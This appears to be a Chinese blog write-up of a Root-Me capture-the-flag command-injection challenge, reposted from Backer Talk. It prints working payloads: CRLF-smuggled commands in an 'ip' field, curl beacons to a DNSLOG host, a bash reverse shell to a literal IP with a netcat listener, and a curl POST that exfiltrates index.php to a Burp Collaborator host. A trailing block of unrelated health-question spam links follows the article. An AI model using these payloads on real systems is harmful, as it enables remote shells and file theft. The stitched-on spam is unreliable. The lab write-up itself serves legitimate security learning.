2025-08-06 16:03:1022029人阅读
??在Root-Me上有一道代码执行的题目,其链接为题目链接
执行多条语句
??打开题目以后,在输入框中提示127.0.0.1
??输入127.0.0.1 && whoami进行测试:
??提示Syntax Error,通过测试,发现127.0.0.1%0d%0awhoami可以执行成功。
??使用反引号执行代码,并用curl将执行结果返回给DNSLOG
ip=127.0.0.1%0d%0acurl `whoami`.t00ls.3e426ecf5c48221e002db4ae061cc4bc.tu4.org
??代码正常执行,查看DNSLOG收到的回显。
??发现whoami没有被执行,而是原样返回。
??既然不能直接执行,就想着用nc返回一个交互式的shell来读取flag。
#服务器端执行
nc -vv -lp 8888
#命令执行处执行
bash -i >& /dev/tcp/47.95.206.199/88880>&1
# payload
ip=127.0.0.1%0d%0abash+-i+>%26+/dev/tcp/47.95.206.199/8888+0>%261
??显示执行成功,但是服务器端并没有受到反弹的shell。
??这个方法是公司的大佬想出来的,并不是本人创作,这里只是记录。
??curl可以正常执行,那么使用curl -F将flag文件上传到Burp的Collaborator Client(Collaborator Client 类似DNSLOG,其功能要比DNSLOG强大,主要体现在可以查看POST请求包以及打Cookies)。
??
获取Collaborator Client分配给BURP的链接。
打开Burp主界面 -->菜单(Burp)-->Burp Collaboraor Client -- > 点击 Copy to Clipboard
粘贴出来大概这样:XXXXXXXXXXXXXXXXXXXXXX.burpcollaborator.net
??拼接Payload,并提交。
# payload
ip=127.0.0.1%0d%0acurl -X POST -F xx=@index.php http://8clb1g723ior2vyd7sbyvcx6vx1ppe.burpcollaborator.net
??查看Collaborator Client收到的数据。
??
可以看到成功读取到了源码。
文章来自Backer Talk原创作者 - admin_Tony,转载需注明出处及本文链接
【Backer Talk】BSRC白客说栏目专注于安全知识分享,长期向安全爱好者征集漏洞分析、漏洞挖掘姿势分享等安全相关内容,欢迎惠赐作品!详情点击【Backer Talk】
脂肪瘤吃什么药可以消除 | 血液粘稠吃什么药 | ii是什么意思 | 哥哥的孩子叫什么 | 肝风内动是什么原因造成的 |
乳房硬块疼是什么原因 | 武警是干什么的 | 唇珠在面相中代表什么 | 吃万艾可有什么副作用 | 破伤风是什么 |
知了什么时候叫 | 做梦梦见火是什么意思 | 诺帝卡是什么档次 | navy是什么意思 | 什么命的人会丧偶 |
丘疹性荨麻疹用什么药 | cet什么意思 | 欧阳修字什么 | lotus是什么车 | 菊花什么时候开放 |
什么寒什么暖hcv7jop6ns4r.cn | 槐子泡水喝有什么功效hcv8jop5ns6r.cn | 齐多夫定片是治什么病的tiangongnft.com | vans属于什么档次hcv8jop9ns0r.cn | 血糖高早饭吃什么最好hcv7jop7ns0r.cn |
血氧饱和度低于90有什么危害hcv7jop9ns4r.cn | 脚底发烫是什么原因dayuxmw.com | 博美犬吃什么狗粮最好hcv7jop5ns4r.cn | 请问紫苏叶有什么功效hcv8jop4ns5r.cn | 小猫的尾巴有什么作用dayuxmw.com |
武夷水仙茶属于什么茶hcv8jop2ns0r.cn | 阴液是什么weuuu.com | 吃什么排湿气最好最快hcv7jop9ns1r.cn | 腰间盘突出是什么症状hcv9jop5ns9r.cn | 风寒水饮是什么意思hcv8jop5ns5r.cn |
西瓜什么时候种hcv7jop6ns2r.cn | 有什么水果hcv9jop2ns4r.cn | 左脸颊长痘是什么原因hcv9jop5ns1r.cn | 家严是什么意思hcv8jop9ns5r.cn | 无关风月是什么意思cj623037.com |